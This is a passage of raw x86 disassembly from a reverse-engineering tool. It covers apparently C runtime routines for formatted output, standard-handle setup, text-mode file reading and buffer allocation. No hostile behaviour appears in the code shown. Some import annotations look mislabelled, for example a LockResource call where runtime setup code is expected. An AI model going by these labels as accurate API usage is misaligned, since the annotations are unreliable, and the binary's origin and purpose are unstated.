mov [ebp+arg_4], edi
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD82: ; CODE XREF: sub_40FBCF+19D�j
; sub_40FBCF+1A3�j
cmp al, 33h
jnz short loc_40FD9A
cmp byte ptr [edi+1], 32h
jnz short loc_40FD9A
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD9A: ; CODE XREF: sub_40FBCF+1B5�j
; sub_40FBCF+1BB�j
cmp al, 64h
jz loc_410324 ; default
cmp al, 69h
jz loc_410324 ; default
cmp al, 6Fh
jz loc_410324 ; default
cmp al, 75h
jz loc_410324 ; default
cmp al, 78h
jz loc_410324 ; default
cmp al, 58h
jz loc_410324 ; default
and [ebp+var_38], 0
loc_40FDCE: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
mov ecx, off_4214EC ; jumptable 0040FC49 case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_40FDF5
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_40FB41
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_40FDF5: ; CODE XREF: sub_40FBCF+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_40FB41
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FE07: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
movsx eax, bl ; jumptable 0040FC49 case 7
cmp eax, 67h
jg loc_410059
cmp eax, 65h
jge loc_40FE9C
cmp eax, 58h
jg loc_40FEFD
jz loc_4100DA
sub eax, 43h
jz loc_40FEBF
dec eax
dec eax
jz short loc_40FE92
dec eax
dec eax
jz short loc_40FE92
sub eax, 0Ch
jnz loc_410222
test word ptr [ebp+var_8], 830h
jnz short loc_40FE51
or byte ptr [ebp+var_8+1], 8
loc_40FE51: ; CODE XREF: sub_40FBCF+27C�j
; sub_40FBCF+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_40FE5E
mov ecx, 7FFFFFFFh
loc_40FE5E: ; CODE XREF: sub_40FBCF+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_4100AF
test eax, eax
jnz short loc_40FE83
mov eax, off_42125C
mov [ebp+var_10], eax
loc_40FE83: ; CODE XREF: sub_40FBCF+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_4100A1
; ---------------------------------------------------------------------------
loc_40FE92: ; CODE XREF: sub_40FBCF+267�j
; sub_40FBCF+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_40FE9C: ; CODE XREF: sub_40FBCF+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_40FFA3
mov [ebp+var_C], 6
jmp loc_40FFEA
; ---------------------------------------------------------------------------
loc_40FEBF: ; CODE XREF: sub_40FBCF+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_40FECB
or byte ptr [ebp+var_8+1], 8
loc_40FECB: ; CODE XREF: sub_40FBCF+2F6�j
; sub_40FBCF+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_40FF3C
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_414CA7
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_40FF4C
mov [ebp+var_34], 1
jmp short loc_40FF4C
; ---------------------------------------------------------------------------
loc_40FEFD: ; CODE XREF: sub_40FBCF+250�j
sub eax, 5Ah
jz short loc_40FF5A
sub eax, 9
jz short loc_40FECB
dec eax
jnz loc_410222
loc_40FF0E: ; CODE XREF: sub_40FBCF+48D�j
or [ebp+var_8], 40h
loc_40FF12: ; CODE XREF: sub_40FBCF+4B1�j
mov [ebp+var_14], 0Ah
loc_40FF19: ; CODE XREF: sub_40FBCF+519�j
; sub_40FBCF+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_41014A
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_410172
; ---------------------------------------------------------------------------
loc_40FF3C: ; CODE XREF: sub_40FBCF+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_40FF4C: ; CODE XREF: sub_40FBCF+323�j
; sub_40FBCF+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_410222
; ---------------------------------------------------------------------------
loc_40FF5A: ; CODE XREF: sub_40FBCF+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_40FF95
mov ecx, [eax+4]
test ecx, ecx
jz short loc_40FF95
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_40FF8C
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_41021F
; ---------------------------------------------------------------------------
loc_40FF8C: ; CODE XREF: sub_40FBCF+3AA�j
and [ebp+var_28], 0
jmp loc_41021F
; ---------------------------------------------------------------------------
loc_40FF95: ; CODE XREF: sub_40FBCF+397�j
; sub_40FBCF+39E�j
mov eax, off_421258
mov [ebp+var_10], eax
push eax
jmp loc_41004E
; ---------------------------------------------------------------------------
loc_40FFA3: ; CODE XREF: sub_40FBCF+2DE�j
jnz short loc_40FFB3
cmp bl, 67h
jnz short loc_40FFEA
mov [ebp+var_C], 1
jmp short loc_40FFEA
; ---------------------------------------------------------------------------
loc_40FFB3: ; CODE XREF: sub_40FBCF:loc_40FFA3�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_40FFC0
mov [ebp+var_C], eax
loc_40FFC0: ; CODE XREF: sub_40FBCF+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_40FFEA
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_40E74F
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_40FFE7
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_40FFEA
; ---------------------------------------------------------------------------
loc_40FFE7: ; CODE XREF: sub_40FBCF+40F�j
mov [ebp+var_C], edi
loc_40FFEA: ; CODE XREF: sub_40FBCF+2EB�j
; sub_40FBCF+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_421364
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_41002F
cmp [ebp+var_C], 0
jnz short loc_41002F
push esi
call off_421370
pop ecx
loc_41002F: ; CODE XREF: sub_40FBCF+450�j
; sub_40FBCF+456�j
cmp bl, 67h
jnz short loc_410040
test edi, edi
jnz short loc_410040
push esi
call off_421368
pop ecx
loc_410040: ; CODE XREF: sub_40FBCF+463�j
; sub_40FBCF+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_41004D
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_41004D: ; CODE XREF: sub_40FBCF+474�j
push esi
loc_41004E: ; CODE XREF: sub_40FBCF+3CF�j
call sub_40D630
pop ecx
jmp loc_41021F
; ---------------------------------------------------------------------------
loc_410059: ; CODE XREF: sub_40FBCF+23E�j
sub eax, 69h
jz loc_40FF0E
sub eax, 5
jz loc_410120
dec eax
jz loc_410106
dec eax
jz short loc_4100D3
sub eax, 3
jz loc_40FE51
dec eax
dec eax
jz loc_40FF12
sub eax, 3
jnz loc_410222
mov [ebp+var_30], 27h
jmp short loc_4100DD
; ---------------------------------------------------------------------------
loc_410098: ; CODE XREF: sub_40FBCF+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_4100A5
inc eax
inc eax
loc_4100A1: ; CODE XREF: sub_40FBCF+2BE�j
test ecx, ecx
jnz short loc_410098
loc_4100A5: ; CODE XREF: sub_40FBCF+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_41021F
; ---------------------------------------------------------------------------
loc_4100AF: ; CODE XREF: sub_40FBCF+2A2�j
test eax, eax
jnz short loc_4100BB
mov eax, off_421258
mov [ebp+var_10], eax
loc_4100BB: ; CODE XREF: sub_40FBCF+4E2�j
mov eax, [ebp+var_10]
jmp short loc_4100C7
; ---------------------------------------------------------------------------
loc_4100C0: ; CODE XREF: sub_40FBCF+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4100CB
inc eax
loc_4100C7: ; CODE XREF: sub_40FBCF+4EF�j
test ecx, ecx
jnz short loc_4100C0
loc_4100CB: ; CODE XREF: sub_40FBCF+4F5�j
sub eax, [ebp+var_10]
jmp loc_41021F
; ---------------------------------------------------------------------------
loc_4100D3: ; CODE XREF: sub_40FBCF+4A4�j
mov [ebp+var_C], 8
loc_4100DA: ; CODE XREF: sub_40FBCF+256�j
mov [ebp+var_30], ecx
loc_4100DD: ; CODE XREF: sub_40FBCF+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_40FF19
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_40FF19
; ---------------------------------------------------------------------------
loc_410106: ; CODE XREF: sub_40FBCF+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_40FF19
or byte ptr [ebp+var_8+1], 2
jmp loc_40FF19
; ---------------------------------------------------------------------------
loc_410120: ; CODE XREF: sub_40FBCF+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_410139
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_41013E
; ---------------------------------------------------------------------------
loc_410139: ; CODE XREF: sub_40FBCF+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_41013E: ; CODE XREF: sub_40FBCF+568�j
mov [ebp+var_34], 1
jmp loc_410311
; ---------------------------------------------------------------------------
loc_41014A: ; CODE XREF: sub_40FBCF+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_410168
test bl, 40h
jz short loc_410162
movsx eax, word ptr [eax-4]
loc_41015F: ; CODE XREF: sub_40FBCF+597�j
; sub_40FBCF+59F�j
cdq
jmp short loc_410172
; ---------------------------------------------------------------------------
loc_410162: ; CODE XREF: sub_40FBCF+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_41015F
; ---------------------------------------------------------------------------
loc_410168: ; CODE XREF: sub_40FBCF+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_41015F
xor edx, edx
loc_410172: ; CODE XREF: sub_40FBCF+368�j
; sub_40FBCF+591�j
test bl, 40h
jz short loc_41018C
test edx, edx
jg short loc_41018C
jl short loc_410181
test eax, eax
jnb short loc_41018C
loc_410181: ; CODE XREF: sub_40FBCF+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_41018C: ; CODE XREF: sub_40FBCF+5A6�j
; sub_40FBCF+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_410197
xor edi, edi
loc_410197: ; CODE XREF: sub_40FBCF+5C4�j
cmp [ebp+var_C], 0
jge short loc_4101A6
mov [ebp+var_C], 1
jmp short loc_4101B7
; ---------------------------------------------------------------------------
loc_4101A6: ; CODE XREF: sub_40FBCF+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_4101B7
mov [ebp+var_C], eax
loc_4101B7: ; CODE XREF: sub_40FBCF+5D5�j
; sub_40FBCF+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_4101C1
and [ebp+var_20], 0
loc_4101C1: ; CODE XREF: sub_40FBCF+5EC�j
lea esi, [ebp+var_55]
loc_4101C4: ; CODE XREF: sub_40FBCF+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_4101D4
mov eax, ebx
or eax, edi
jz short loc_4101F8
loc_4101D4: ; CODE XREF: sub_40FBCF+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_40E770
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_4101F3
add ecx, [ebp+var_30]
loc_4101F3: ; CODE XREF: sub_40FBCF+61F�j
mov [esi], cl
dec esi
jmp short loc_4101C4
; ---------------------------------------------------------------------------
loc_4101F8: ; CODE XREF: sub_40FBCF+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_410222
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_410215
test eax, eax
jnz short loc_410222
loc_410215: ; CODE XREF: sub_40FBCF+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_41021F: ; CODE XREF: sub_40FBCF+3B8�j
; sub_40FBCF+3C1�j ...
mov [ebp+var_14], eax
loc_410222: ; CODE XREF: sub_40FBCF+270�j
; sub_40FBCF+339�j ...
cmp [ebp+var_34], 0
jnz loc_410311
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_41025A
test bh, 1
jz short loc_41023F
mov [ebp+var_1C], 2Dh
jmp short loc_410253
; ---------------------------------------------------------------------------
loc_41023F: ; CODE XREF: sub_40FBCF+668�j
test bl, 1
jz short loc_41024A
mov [ebp+var_1C], 2Bh
jmp short loc_410253
; ---------------------------------------------------------------------------
loc_41024A: ; CODE XREF: sub_40FBCF+673�j
test bl, 2
jz short loc_41025A
mov [ebp+var_1C], 20h
loc_410253: ; CODE XREF: sub_40FBCF+66E�j
; sub_40FBCF+679�j
mov [ebp+var_20], 1
loc_41025A: ; CODE XREF: sub_40FBCF+663�j
; sub_40FBCF+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_410279
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_40FB74
add esp, 0Ch
loc_410279: ; CODE XREF: sub_40FBCF+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_40FB98
test bl, 8
pop ecx
jz short loc_4102A4
test bl, 4
jnz short loc_4102A4
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_40FB74
add esp, 0Ch
loc_4102A4: ; CODE XREF: sub_40FBCF+6BF�j
; sub_40FBCF+6C4�j
cmp [ebp+var_28], 0
jz short loc_4102EB
cmp [ebp+var_14], 0
jle short loc_4102EB
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_4102B9: ; CODE XREF: sub_40FBCF+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_414CA7
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_4102FA
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_40FB98
cmp [ebp+var_40], 0
pop ecx
jnz short loc_4102B9
jmp short loc_4102FA
; ---------------------------------------------------------------------------
loc_4102EB: ; CODE XREF: sub_40FBCF+6D9�j
; sub_40FBCF+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_40FB98
pop ecx
loc_4102FA: ; CODE XREF: sub_40FBCF+702�j
; sub_40FBCF+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_410311
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_40FB74
add esp, 0Ch
loc_410311: ; CODE XREF: sub_40FBCF+576�j
; sub_40FBCF+657�j ...
cmp [ebp+var_2C], 0
jz short loc_410324 ; default
push [ebp+var_2C]
call sub_40E359
and [ebp+var_2C], 0
pop ecx
loc_410324: ; CODE XREF: sub_40FBCF+74�j
; sub_40FBCF+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_40FC04
loc_410331: ; CODE XREF: sub_40FBCF+40�j
pop edi
pop esi
loc_410333: ; CODE XREF: sub_40FBCF+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_411BA5
leave
retn
sub_40FBCF endp
; ---------------------------------------------------------------------------
off_410344 dd offset loc_40FDCE ; DATA XREF: sub_40FBCF+7A�r
dd offset loc_40FC50 ; jump table for switch statement
dd offset loc_40FC6D
dd offset loc_40FCB9
dd offset loc_40FCF4
dd offset loc_40FCFD
dd offset loc_40FD35
dd offset loc_40FE07
; =============== S U B R O U T I N E =======================================
sub_410364 proc near ; CODE XREF: .text:0040F94D�p
var_44 = byte ptr -44h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 44h
push 100h
call sub_40E74F
test eax, eax
pop ecx
jnz short loc_41037E
or eax, 0FFFFFFFFh
jmp loc_41050B
; ---------------------------------------------------------------------------
loc_41037E: ; CODE XREF: sub_410364+10�j
mov dword_4C5DC0, eax
mov dword_4C5DA0, 20h
lea ecx, [eax+100h]
jmp short loc_4103AF
; ---------------------------------------------------------------------------
loc_410395: ; CODE XREF: sub_410364+4D�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, dword_4C5DC0
add eax, 8
add ecx, 100h
loc_4103AF: ; CODE XREF: sub_410364+2F�j
cmp eax, ecx
jb short loc_410395
push ebx
push esi
push edi
lea eax, [esp+50h+var_44]
push eax
call dword_4191C4 ; GetStartupInfoA
cmp [esp+4Ch+var_E], 0
jz loc_410494
mov eax, [esp+4Ch+var_C]
test eax, eax
jz loc_410494
mov esi, [eax]
push ebp
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_4103ED
mov esi, eax
loc_4103ED: ; CODE XREF: sub_410364+85�j
cmp dword_4C5DA0, esi
jge short loc_410447
mov edi, offset dword_4C5DC4
loc_4103FA: ; CODE XREF: sub_410364+D9�j
push 100h
call sub_40E74F
test eax, eax
pop ecx
jz short loc_410441
add dword_4C5DA0, 20h
mov [edi], eax
lea ecx, [eax+100h]
jmp short loc_410430
; ---------------------------------------------------------------------------
loc_41041A: ; CODE XREF: sub_410364+CE�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
loc_410430: ; CODE XREF: sub_410364+B4�j
cmp eax, ecx
jb short loc_41041A
add edi, 4
cmp dword_4C5DA0, esi
jl short loc_4103FA
jmp short loc_410447
; ---------------------------------------------------------------------------
loc_410441: ; CODE XREF: sub_410364+A3�j
mov esi, dword_4C5DA0
loc_410447: ; CODE XREF: sub_410364+8F�j
; sub_410364+DB�j
xor edi, edi
test esi, esi
jle short loc_410493
loc_41044D: ; CODE XREF: sub_410364+12D�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41048A
mov cl, [ebp+0]
test cl, 1
jz short loc_41048A
test cl, 8
jnz short loc_41046C
push eax
call dword_4191B0 ; GetFileType
test eax, eax
jz short loc_41048A
loc_41046C: ; CODE XREF: sub_410364+FB�j
mov eax, edi
sar eax, 5
mov eax, dword_4C5DC0[eax*4]
mov ecx, edi
and ecx, 1Fh
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41048A: ; CODE XREF: sub_410364+EE�j
; sub_410364+F6�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41044D
loc_410493: ; CODE XREF: sub_410364+E7�j
pop ebp
loc_410494: ; CODE XREF: sub_410364+63�j
; sub_410364+6F�j
xor ebx, ebx
loc_410496: ; CODE XREF: sub_410364+194�j
mov eax, dword_4C5DC0
lea esi, [eax+ebx*8]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4104F0
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_4104B0
push 0FFFFFFF6h
pop eax
jmp short loc_4104BA
; ---------------------------------------------------------------------------
loc_4104B0: ; CODE XREF: sub_410364+145�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4104BA: ; CODE XREF: sub_410364+14A�j
push eax
call dword_4191D0 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4104DF
push edi
call dword_4191B0 ; GetFileType
test eax, eax
jz short loc_4104DF
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_4104E5
loc_4104DF: ; CODE XREF: sub_410364+162�j
; sub_410364+16D�j
or byte ptr [esi+4], 40h
jmp short loc_4104F4
; ---------------------------------------------------------------------------
loc_4104E5: ; CODE XREF: sub_410364+179�j
cmp eax, 3
jnz short loc_4104F4
or byte ptr [esi+4], 8
jmp short loc_4104F4
; ---------------------------------------------------------------------------
loc_4104F0: ; CODE XREF: sub_410364+13D�j
or byte ptr [esi+4], 80h
loc_4104F4: ; CODE XREF: sub_410364+17F�j
; sub_410364+184�j ...
inc ebx
cmp ebx, 3
jl short loc_410496
push dword_4C5DA0
call dword_4191CC ; LockResource
pop edi
pop esi
xor eax, eax
pop ebx
loc_41050B: ; CODE XREF: sub_410364+15�j
add esp, 44h
retn
sub_410364 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41050F proc near ; CODE XREF: sub_40D9DD+4A�p
; sub_40E94D+91�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
cmp esi, dword_4C5DA0
push edi
jnb loc_4106D6
mov eax, esi
sar eax, 5
lea ebx, ds:4C5DC0h[eax*4]
mov eax, [ebx]
and esi, 1Fh
shl esi, 3
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_4106D6
and [ebp+var_C], 0
cmp [ebp+arg_8], 0
mov edi, [ebp+arg_4]
mov ecx, edi
jz short loc_4105B5
test dl, 2
jnz short loc_4105B5
test dl, 48h
jz short loc_41057F
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41057F
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_C], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41057F: ; CODE XREF: sub_41050F+51�j
; sub_41050F+58�j
push 0
lea eax, [ebp+var_10]
push eax
push [ebp+arg_8]
mov eax, [ebx]
push ecx
push dword ptr [eax+esi]
call dword_419110 ; ReadFile
test eax, eax
jnz short loc_4105C8
call dword_4190AC ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_4105B0
mov dword_4C5908, ecx
jmp loc_4106DD
; ---------------------------------------------------------------------------
loc_4105B0: ; CODE XREF: sub_41050F+94�j
cmp eax, 6Dh
jnz short loc_4105BC
loc_4105B5: ; CODE XREF: sub_41050F+47�j
; sub_41050F+4C�j
xor eax, eax
jmp loc_4106EA
; ---------------------------------------------------------------------------
loc_4105BC: ; CODE XREF: sub_41050F+A4�j
push eax
call sub_412BBA
pop ecx
jmp loc_4106E7
; ---------------------------------------------------------------------------
loc_4105C8: ; CODE XREF: sub_41050F+87�j
mov eax, [ebx]
mov edx, [ebp+var_10]
add [ebp+var_C], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_4106D1
test edx, edx
jz short loc_4105EB
cmp byte ptr [edi], 0Ah
jnz short loc_4105EB
or al, 4
jmp short loc_4105ED
; ---------------------------------------------------------------------------
loc_4105EB: ; CODE XREF: sub_41050F+D1�j
; sub_41050F+D6�j
and al, 0FBh
loc_4105ED: ; CODE XREF: sub_41050F+DA�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], eax
mov [ebp+var_C], ecx
jnb loc_4106CB
loc_410605: ; CODE XREF: sub_41050F+1A4�j
mov eax, [ebp+var_8]
mov al, [eax]
cmp al, 1Ah
jz loc_4106BB
cmp al, 0Dh
jz short loc_410621
mov [edi], al
inc edi
inc [ebp+var_8]
jmp loc_4106AD
; ---------------------------------------------------------------------------
loc_410621: ; CODE XREF: sub_41050F+105�j
dec ecx
cmp [ebp+var_8], ecx
jnb short loc_41063B
mov eax, [ebp+var_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_410636
add [ebp+var_8], 2
jmp short loc_41068F
; ---------------------------------------------------------------------------
loc_410636: ; CODE XREF: sub_41050F+11F�j
mov [ebp+var_8], eax
jmp short loc_4106A9
; ---------------------------------------------------------------------------
loc_41063B: ; CODE XREF: sub_41050F+116�j
inc [ebp+var_8]
push 0
lea eax, [ebp+var_10]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_419110 ; ReadFile
test eax, eax
jnz short loc_410663
call dword_4190AC ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4106A9
loc_410663: ; CODE XREF: sub_41050F+148�j
cmp [ebp+var_10], 0
jz short loc_4106A9
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_410684
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41068F
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
mov [ecx+esi+5], al
jmp short loc_4106AC
; ---------------------------------------------------------------------------
loc_410684: ; CODE XREF: sub_41050F+161�j
cmp edi, [ebp+arg_4]
jnz short loc_410694
cmp [ebp+var_1], 0Ah
jnz short loc_410694
loc_41068F: ; CODE XREF: sub_41050F+125�j
; sub_41050F+168�j
mov byte ptr [edi], 0Ah
jmp short loc_4106AC
; ---------------------------------------------------------------------------
loc_410694: ; CODE XREF: sub_41050F+178�j
; sub_41050F+17E�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_4134BF
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_4106AD
loc_4106A9: ; CODE XREF: sub_41050F+12A�j
; sub_41050F+152�j ...
mov byte ptr [edi], 0Dh
loc_4106AC: ; CODE XREF: sub_41050F+173�j
; sub_41050F+183�j
inc edi
loc_4106AD: ; CODE XREF: sub_41050F+10D�j
; sub_41050F+198�j
mov ecx, [ebp+var_C]
cmp [ebp+var_8], ecx
jb loc_410605
jmp short loc_4106CB
; ---------------------------------------------------------------------------
loc_4106BB: ; CODE XREF: sub_41050F+FD�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_4106CB
or al, 2
mov [esi], al
loc_4106CB: ; CODE XREF: sub_41050F+F0�j
; sub_41050F+1AA�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_C], edi
loc_4106D1: ; CODE XREF: sub_41050F+C9�j
mov eax, [ebp+var_C]
jmp short loc_4106EA
; ---------------------------------------------------------------------------
loc_4106D6: ; CODE XREF: sub_41050F+12�j
; sub_41050F+34�j
and dword_4C5908, 0
loc_4106DD: ; CODE XREF: sub_41050F+9C�j
mov dword_4C5904, 9
loc_4106E7: ; CODE XREF: sub_41050F+B4�j
or eax, 0FFFFFFFFh
loc_4106EA: ; CODE XREF: sub_41050F+A8�j
; sub_41050F+1C5�j
pop edi
pop esi
pop ebx
leave
retn
sub_41050F endp
; =============== S U B R O U T I N E =======================================
sub_4106EF proc near ; CODE XREF: sub_40D9DD+34�p
; sub_40FA2B+6F�p ...
arg_0 = dword ptr 4
inc dword_4C5900
push 1000h
call sub_40E74F
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_410718
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_410729
; ---------------------------------------------------------------------------
loc_410718: ; CODE XREF: sub_4106EF+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_410729: ; CODE XREF: sub_4106EF+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_4106EF endp
; =============== S U B R O U T I N E =======================================
sub_410733 proc near ; CODE XREF: sub_40DABB+22�p
; sub_40DABB+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
imul esi, [esp+8+arg_4]
test esi, esi
push edi
mov ebx, esi
jnz short loc_410746
inc esi
loc_410746: ; CODE XREF: sub_410733+10�j
; sub_410733+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_410786
cmp dword_4C5B68, 3
jnz short loc_410771
add esi, 0Fh
and esi, 0FFFFFFF0h
cmp ebx, dword_4C5B54
ja short loc_410771
push ebx
call sub_4128A3
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41079C
loc_410771: ; CODE XREF: sub_410733+21�j
; sub_410733+2F�j
push esi
push 8
